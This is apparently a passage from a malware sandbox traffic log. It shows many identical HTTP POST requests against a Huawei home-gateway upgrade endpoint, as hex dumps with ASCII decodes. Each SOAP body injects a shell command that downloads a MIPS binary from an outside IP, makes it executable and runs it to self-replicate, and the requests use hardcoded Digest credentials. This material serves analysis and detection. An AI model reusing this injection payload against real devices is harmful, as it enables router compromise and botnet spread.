65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 